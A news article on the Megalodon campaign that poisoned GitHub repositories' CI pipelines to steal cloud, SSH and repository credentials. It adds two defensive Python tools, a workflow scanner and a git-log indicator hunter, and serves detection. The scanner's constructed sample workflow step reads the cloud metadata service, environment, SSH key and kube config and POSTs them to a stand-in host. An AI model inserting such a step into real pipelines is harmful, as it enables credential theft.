Megalodon Malware Campaign Poisons Over 5,500 GitHub Repositories

A New Wave of Supply Chain Poisoning
GitHub is currently grappling with a massive, automated malware campaign dubbed “Megalodon,” which has successfully pushed malicious commits to more than 5,500 repositories. The attack, identified by researchers at SafeDep, represents a calculated effort to compromise the software supply chain by targeting the Continuous Integration/Continuous Deployment (CI/CD) pipelines that developers rely on to ship code.
The campaign follows the pattern of the earlier TeamPCP attacks, which hit roughly 3,800 repositories, but Megalodon is larger in scale and more precise in execution. According to SafeDep, exactly 5,561 repositories were infected. The payload runs once the malicious commit is merged or pushed and the repository's CI/CD pipeline executes it, harvesting secrets silently from the build environment before using them to propagate further into the ecosystem.
The Anatomy of the Theft
Megalodon is not designed to destroy data but to steal the “keys to the kingdom.” Once active, the malware scans for AWS secret keys and Google Cloud access tokens. It does not stop at environment variables: it also queries the instance metadata services of AWS, Google Cloud Platform (GCP) and Azure, which hand out the temporary credentials of whatever IAM role or service account is attached to the build runner.
The scope of the exfiltration is comprehensive. The malware reads SSH private keys, Docker and Kubernetes configurations and Vault tokens, and runs more than 30 regular expressions over the checked-out source code to find hardcoded secrets. Finally, it exfiltrates GitHub and Bitbucket tokens, which allow the attackers to impersonate developers and move laterally across the company's repositories and cloud infrastructure.
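What such a step looks like from the defender's side, as an added example that is not SafeDep's code or the Megalodon payload: a small Python scanner that walks a GitHub Actions workflow line by line and flags the behaviours described above (reads of the AWS, GCP and Azure instance metadata endpoints, environment dumps, reads of SSH, Docker, Kubernetes and Vault files, and the outbound transfer that follows). The workflow it scans is constructed for this example; its step name copies the article's “build optimization step” ruse and the collector URL is invented.

```python
import re

# Indicator patterns keyed by what they detect. The metadata endpoints are the
# well-known IMDS addresses: AWS and Azure both answer on 169.254.169.254, GCP on
# metadata.google.internal. `toJSON(secrets)` is the GitHub Actions expression
# that serialises every repository secret at once.
INDICATORS = [
    ("cloud metadata endpoint",
     re.compile(r"169\.254\.169\.254|metadata\.google\.internal")),
    ("environment dump",
     re.compile(r"\b(?:printenv|env)\b\s*(?:>|\|)|toJSON\(\s*secrets\s*\)")),
    ("ssh private key read",
     re.compile(r"\.ssh/(?:id_[A-Za-z0-9]+|\*)")),
    ("docker/kube/vault config read",
     re.compile(r"\.docker/config\.json|\.kube/config|\.vault-token")),
    ("remote code fetch",
     re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b")),
    ("outbound POST of data",
     re.compile(r"\bcurl\b[^\n]*(?:--data-binary\s*@|-d\s*@|-X\s*POST\b)")),
    ("base64 decode to shell",
     re.compile(r"base64\s+(?:-d|--decode)\b[^|\n]*\|\s*(?:ba)?sh\b")),
]

# Indicators that collect credentials versus those that move code or data.
COLLECT = {"cloud metadata endpoint", "environment dump",
           "ssh private key read", "docker/kube/vault config read"}
EXFIL = {"remote code fetch", "outbound POST of data", "base64 decode to shell"}

STEP_START = re.compile(r"^\s*-\s")                 # a new item in a `steps:` list
STEP_NAME = re.compile(r"^\s*-?\s*name:\s*(.+?)\s*$")  # `name:` of the current item


def scan_workflow(text):
    """Return (line_number, step_name, indicator) for every matching line.

    Tracks the enclosing `- name:` so each hit can be tied to the step that
    carries it; lines before any named step report '<unnamed step>'.
    """
    hits = []
    step = "<unnamed step>"
    for lineno, line in enumerate(text.splitlines(), start=1):
        if STEP_START.match(line):
            step = "<unnamed step>"
        named = STEP_NAME.match(line)
        if named:
            step = named.group(1)
        for label, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((lineno, step, label))
    return hits


def verdict(hits):
    """Credential collection plus an outbound channel is the Megalodon shape;
    any single indicator is still worth a human look."""
    labels = {label for _, _, label in hits}
    if labels & COLLECT and labels & EXFIL:
        return "likely credential harvesting"
    if labels:
        return "review"
    return "clean"


# Constructed sample workflow: a benign build with one poisoned step appended.
SAMPLE_WORKFLOW = """\
name: CI
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install dependencies
        run: npm ci
      - name: build optimization step
        run: |
          curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ > /tmp/c
          env | base64 -w0 > /tmp/e
          cat ~/.ssh/id_rsa ~/.kube/config >> /tmp/e 2>/dev/null
          curl -X POST --data-binary @/tmp/e https://collector.invalid/upload
"""

if __name__ == "__main__":
    found = scan_workflow(SAMPLE_WORKFLOW)
    for lineno, step, label in found:
        print(f"line {lineno:>3}  step '{step}': {label}")
    print("verdict:", verdict(found))
```

Run it against every file under .github/workflows/ (and any reusable workflow or composite action the repository pulls in) rather than only the one named in a suspicious commit; the patterns are deliberately broad, so treat a "review" verdict as a prompt to read the step, not as proof of compromise.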
Moshe Siman Tov Bustan, a lead researcher at Ox Security, warns that this marks a shift in the threat landscape. “We’ve entered a new supply chain attack era,” Bustan noted, describing the current climate as a “tsunami of cyber attacks on developers worldwide.” He argues that the compromise of GitHub’s infrastructure puts every organization with a private repository at risk.
The Tiledesk Breach and the ‘Build-Bot’ Ruse
The attackers gained their foothold by hiding the malware inside a legitimate open-source package. SafeDep found the poisoned code in Tiledesk, an open-source live chat and chatbot platform. The attackers did not take over the project's npm account; they compromised the GitHub repository itself, so when the maintainer built and published versions 2.18.6 through 2.18.12 between May 19 and May 21, each release carried the malicious code without the maintainer knowing the source had been tampered with.
The commits were crafted to blend into the background of a busy repository. SafeDep traced the malicious activity to an author listed as “build-bot” with the email address build-system[@]noreply.dev, and the commit message “ci: add build optimization step” was chosen to look like a routine automated update. Because the attacker most likely held a compromised Personal Access Token (PAT) or deploy key, they could push directly to the master branch and bypass the Pull Request (PR) review process entirely. That also means the branch accepted direct pushes from that credential: a branch protection rule requiring reviewed pull requests, enforced for every identity including bots and administrators, would have forced the change through review instead.
Analyzing the Threat Actor
Although the tactics mirror those of TeamPCP, researchers are not yet convinced that Megalodon is the work of the same group. Some analysts suggest a copycat; others point out that Megalodon lacks the identifiers used in the recent supply-chain “competitions” hosted on forums like BreachForums, specifically the public encryption keys those contests require participants to embed so that an attack can be attributed to them.
The scale of the attack is evident in the commit logs. Researchers found two email addresses behind almost all of the activity: build-system[@]noreply.dev (2,878 commits) and ci-bot[@]automated.dev (2,841 commits). The commits all landed within a six-hour window on May 18, which points to a fully automated and coordinated strike.
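A way to hunt for exactly the traces described in this section and in the Tiledesk account above (the build-bot author, the two sender addresses, the routine-looking commit subject and the tight time cluster), as an added example rather than SafeDep's tooling: a Python script that parses the output of `git log --format='%H%x09%an%x09%ae%x09%aI%x09%s'` and flags commits whose author email or subject matches the published indicators, or whose author is not on the repository's own allow-list of maintainers. The log lines below are constructed for the example; the maintainer names, the example.org addresses and the year in the timestamps are assumptions.

```python
from datetime import datetime, timedelta

# Indicators from the article, written undefanged so they compare equal to the
# values git actually stores.
IOC_EMAILS = {"build-system@noreply.dev", "ci-bot@automated.dev"}
IOC_SUBJECTS = {"ci: add build optimization step"}

# Assumed allow-list of identities expected to commit to this repository.
KNOWN_AUTHORS = {"alice@example.org", "release-bot@example.org"}

# Constructed sample of what the git log format above prints: tab-separated
# sha, author name, author email, ISO 8601 author date, subject.
SAMPLE_LOG = "\n".join([
    "a1b2c3d\tAlice Maintainer\talice@example.org\t2025-05-17T14:02:10+00:00\tfix: handle empty payload",
    "d4e5f6a\tbuild-bot\tbuild-system@noreply.dev\t2025-05-18T03:12:44+00:00\tci: add build optimization step",
    "0f9e8d7\tci-bot\tci-bot@automated.dev\t2025-05-18T05:40:01+00:00\tci: add build optimization step",
    "bb22cc3\trelease-bot\trelease-bot@example.org\t2025-05-18T06:00:00+00:00\tchore: bump version",
    "7777777\tAlice Maintainer\talice@example.org\t2025-05-19T09:30:00+00:00\tchore: release 2.18.6",
])


def parse_log(text):
    """Split the tab-separated log into dicts; malformed lines are skipped."""
    commits = []
    for line in text.splitlines():
        parts = line.split("\t", 4)
        if len(parts) != 5:
            continue
        sha, name, email, date, subject = parts
        commits.append({
            "sha": sha, "name": name, "email": email.lower(),
            "date": datetime.fromisoformat(date), "subject": subject,
        })
    return commits


def flag_commits(commits, known_authors):
    """Return [(commit, [reasons])] for commits that match an IOC or come from
    an author outside the allow-list. Reasons stay separate so an analyst can
    tell a hard IOC hit from a merely unexpected author."""
    flagged = []
    for c in commits:
        reasons = []
        if c["email"] in IOC_EMAILS:
            reasons.append("author email is a Megalodon IOC")
        if c["subject"].strip().lower() in IOC_SUBJECTS:
            reasons.append("subject matches the Megalodon commit message")
        if c["email"] not in known_authors:
            reasons.append("author not in the maintainer allow-list")
        if reasons:
            flagged.append((c, reasons))
    return flagged


def burst_window(flagged):
    """Span between the first and last flagged commit: an automated campaign
    clusters into hours, hand-made commits spread over days."""
    if not flagged:
        return timedelta(0)
    dates = [c["date"] for c, _ in flagged]
    return max(dates) - min(dates)


if __name__ == "__main__":
    import sys
    # Use the constructed sample in a terminal; read real `git log` output when piped.
    text = SAMPLE_LOG if sys.stdin.isatty() else sys.stdin.read()
    suspicious = flag_commits(parse_log(text), KNOWN_AUTHORS)
    for commit, reasons in suspicious:
        print(commit["sha"], commit["email"], commit["subject"])
        for reason in reasons:
            print("   -", reason)
    print("flagged commits span", burst_window(suspicious))
```

Against a real checkout, pipe the log in with `git log --format='%H%x09%an%x09%ae%x09%aI%x09%s' master | python hunt.py`, and check every branch and tag, not just master: a tag built from a poisoned commit is what shipped in the Tiledesk releases. Author email and name in git are attacker-controlled strings, so a clean result here only rules out the published indicators; it does not prove a commit was pushed by the person it names.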
The fallout extends beyond Tiledesk to projects such as the Black-Iron-Project and WISE-Community, along with hundreds of smaller repositories. As cloud identities become the primary target of modern breaches, the Megalodon campaign exposes a systemic weakness in how developers trust automated commits and manage their CI/CD secrets: a commit that looks like bot housekeeping, pushed without review, gets the same access to runner credentials as any maintainer's change.